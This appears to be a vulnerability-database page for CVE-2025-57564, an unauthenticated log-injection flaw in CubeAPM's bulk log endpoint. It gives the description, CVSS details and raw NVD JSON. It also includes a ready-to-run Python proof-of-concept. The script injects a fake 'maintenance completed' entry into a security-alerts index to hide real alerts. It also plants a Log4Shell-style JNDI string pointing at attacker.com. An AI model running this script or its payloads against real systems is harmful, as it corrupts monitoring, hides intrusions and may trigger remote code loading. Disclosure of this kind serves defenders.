Security Vulnerability Report
中文
CVE-2025-57564 CVSS 8.2 HIGH

CVE-2025-57564

Published: 2025-10-07 14:15:39
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

CubeAPM nightly-2025-08-01-1 allow unauthenticated attackers to inject arbitrary log entries into production systems via the /api/logs/insert/elasticsearch/_bulk endpoint. This endpoint accepts bulk log data without requiring authentication or input validation, allowing remote attackers to perform unauthorized log injection. Exploitation may lead to false log entries, log poisoning, alert obfuscation, and potential performance degradation of the observability pipeline. The issue is present in the core CubeAPM platform and is not limited to specific deployment configurations.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

CubeAPM nightly-2025-08-01-1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-57564: CubeAPM Unauthenticated Log Injection PoC # This PoC demonstrates arbitrary log injection via the /api/logs/insert/elasticsearch/_bulk endpoint # No authentication required import requests import json import sys from datetime import datetime TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target-cubeapm:8080" ENDPOINT = f"{TARGET_URL}/api/logs/insert/elasticsearch/_bulk" def inject_logs(target_host, log_entries): """ Inject arbitrary log entries into CubeAPM without authentication. :param target_host: Target CubeAPM instance URL :param log_entries: List of log entry dictionaries to inject """ headers = { "Content-Type": "application/x-ndjson", "User-Agent": "Mozilla/5.0 (compatible; LogInjector/1.0)" } # Build Elasticsearch Bulk API format payload bulk_data = "" for entry in log_entries: # Index action metadata action = json.dumps({"index": {"_index": entry.get("index", "logs")}}) # Document body document = json.dumps({ "@timestamp": entry.get("timestamp", datetime.utcnow().isoformat()), "message": entry.get("message", "Injected log entry"), "level": entry.get("level", "INFO"), "service": entry.get("service", "unknown"), "host": entry.get("host", "injected-host"), "source_ip": entry.get("source_ip", "0.0.0.0"), "user_agent": entry.get("user_agent", "CVE-2025-57564") }) bulk_data += action + "\n" + document + "\n" try: response = requests.post( ENDPOINT, data=bulk_data, headers=headers, timeout=10 ) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response: {response.text[:500]}") return response except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": # Example: Inject a false security alert to obfuscate real alerts false_alert = [{ "index": "security-alerts", "message": "Routine maintenance check completed successfully", "level": "INFO", "service": "firewall", "host": "internal-server-01", "source_ip": "192.168.1.1", "user_agent": "internal-monitor" }] # Example: Inject logs with potentially malicious payloads malicious_logs = [{ "index": "application-logs", "message": "${jndi:ldap://attacker.com/exploit}", # Log4Shell-style payload "level": "WARN", "service": "web-app", "host": "production-server" }] print(f"[*] Target: {ENDPOINT}") print("[*] Injecting false alert logs...") inject_logs(TARGET_URL, false_alert) print("\n[*] Injecting test payload logs...") inject_logs(TARGET_URL, malicious_logs) print("\n[!] Log injection completed successfully")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-57564", "sourceIdentifier": "[email protected]", "published": "2025-10-07T14:15:38.807", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "CubeAPM nightly-2025-08-01-1 allow unauthenticated attackers to inject arbitrary log entries into production systems via the /api/logs/insert/elasticsearch/_bulk endpoint. This endpoint accepts bulk log data without requiring authentication or input validation, allowing remote attackers to perform unauthorized log injection. Exploitation may lead to false log entries, log poisoning, alert obfuscation, and potential performance degradation of the observability pipeline. The issue is present in the core CubeAPM platform and is not limited to specific deployment configurations."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-117"}]}], "references": [{"url": "https://github.com/prassan10/CubeAPM/blob/main/CVE-2025-57564%3A%20Unauthenticated%20Log%20Injection%20in%20CubeAPM", "source": "[email protected]"}, {"url": "https://github.com/prassan10/CubeAPM/blob/main/Unauthenticated-Log_Injection", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.